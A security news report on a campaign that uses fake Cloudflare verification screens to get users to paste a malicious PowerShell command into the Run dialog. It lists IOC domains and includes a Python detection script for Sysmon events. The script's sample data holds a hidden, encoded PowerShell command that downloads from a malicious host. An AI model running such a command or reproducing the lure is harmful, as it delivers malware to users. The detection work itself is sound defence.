Hackers Exploit Fake Cloudflare Verification Screens to Trick Users into Installing Malware

Cybercriminals are leveraging a deceptive new technique involving fake Cloudflare verification screens to convince users to unwittingly install malware on their systems.

This social engineering method showcases a high degree of sophistication, preying on users’ expectations for security while subverting it for malicious ends.

Sophisticated Social Engineering Lures Users

The attack begins when unsuspecting users land on a compromised website rigged with a counterfeit Cloudflare CAPTCHA verification prompt.

[Figure: fake Cloudflare CAPTCHA verification prompt]

Instead of performing a legitimate check, the page displays a convincing but entirely fake Cloudflare challenge, luring the victim into clicking a “Verify” button to ostensibly prove their humanity.

Upon clicking “Verify,” the site stealthily injects a PowerShell command into the user’s clipboard. This command is designed to be executed via Windows’ Run prompt.

The page then claims an additional step is needed, instructing the user to open the Run dialog (Win+R) and paste the contents of their clipboard.

Simultaneously, the malicious page records the user’s IP address and silently signals the attacker’s server via a webhook that the Run prompt has been activated.

To further increase the likelihood of user compliance, the webpage can also monitor keystrokes to detect when the Run prompt is invoked.

Technical Breakdown of the Attack

If the victim pastes and runs the PowerShell command, it fetches a second, base64-encoded PowerShell script hosted on “pastesio[.]com.”

Once decoded and executed, this script downloads a batch file (.BAT) from “axiomsniper[.]info.”

At this juncture, the batch file executes a series of checks for telltale signs of virtualization, for instance examining process listings and hardware configurations indicative of sandbox or virtual machine environments.

If any are detected, the payload halts, evading analysis and sandbox detection. For environments that pass these checks, the batch file proceeds to deploy additional malware, potentially ranging from info-stealers to ransomware.

Notably, this payload currently evades all known antivirus detection engines, with zero detections reported on VirusTotal at the time of reporting.

Such stealth underscores both the evolving sophistication of these campaigns and the ongoing cat-and-mouse dynamic between adversaries and the security community.

The campaign is being actively tracked by security researchers, who have provided threat hunting queries to help others identify and mitigate these attacks.
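As an added illustration (not the report's own code and not the researchers' published hunting queries), the following Python check scores Sysmon process-creation events against the chain described above: PowerShell spawned under explorer.exe (the Win+R Run dialog), a hidden window, and any of the report's IOC domains, including one wrapped inside an -EncodedCommand payload. The event records, the field subset, the helper names and the sample command lines are all constructed for this example.

```python
import base64
import re
# Domains from the report's IOC table, refanged from the "[.]" form it prints.
IOC_DOMAINS = [d.replace("[.]", ".") for d in
               ("dex-redirect[.]com", "pastesio[.]com", "axiomsniper[.]info")]

def encode_ps(script):  # what PowerShell's -EncodedCommand expects: UTF-16LE, base64
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Constructed Sysmon Event ID 1 (process creation) records, reduced to the three
# fields the check uses. Sample data only, not captured telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,       # pasted into Win+R
     "CommandLine": "powershell -w hidden -ep bypass -enc "
                    + encode_ps("Invoke-WebRequest https://pastesio.com/EXAMPLE")},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,       # user opened a console
     "CommandLine": "powershell -NoProfile"},
]

def decode_encoded_command(cmdline):
    """Return the plaintext behind -EncodedCommand (or -e/-ec/-enc), else ''."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""

def assess(event):
    """List the signals that make one process-creation event resemble this chain."""
    reasons = []
    if not event["Image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return reasons
    # The Run dialog belongs to explorer.exe, so a paste into Win+R shows this parent.
    # Interactive console launches show it too, so it is one signal among several.
    if event["ParentImage"].lower().endswith("explorer.exe"):
        reasons.append("parent explorer.exe (Run dialog)")
    cmd = event["CommandLine"]
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
        reasons.append("hidden window")
    # Decode the payload so a domain wrapped in -EncodedCommand is still matched.
    text = (cmd + " " + decode_encoded_command(cmd)).lower()
    reasons += [f"IOC domain {d}" for d in IOC_DOMAINS if d in text]
    return reasons

def triage(events, min_signals=2):  # (signals, event) pairs, strongest first
    hits = [(assess(e), e) for e in events if len(assess(e)) >= min_signals]
    return sorted(hits, key=lambda h: -len(h[0]))
```

Requiring two stacked signals keeps an analyst's ordinary console launch (explorer.exe parent alone) out of the results while the pasted Run-dialog command still surfaces.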

According to the report, researchers caution users and organizations to be extra vigilant when encountering unexpected verification prompts, particularly those asking for unusual actions such as copying and running code.

This attack exemplifies the increasing professionalism of social engineering ploys and the blending of technical and psychological tactics.

Users are encouraged to verify the legitimacy of CAPTCHA and security checks, avoid copying code from untrusted sources, and ensure endpoint security tools are updated, though, as this campaign shows, defenses still struggle to keep pace with novel threats.

Cybersecurity professionals should proactively monitor for any communication with these domains and educate users about the risks of manually executing code delivered via web-based “verification” schemes.

Indicators of Compromise (IOCs)

IOC | Description
dex-redirect[.]com | Phishing landing / redirect domain
pastesio[.]com | Hosts malicious PowerShell payload
axiomsniper[.]info | Distributes secondary malware (BAT)


Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
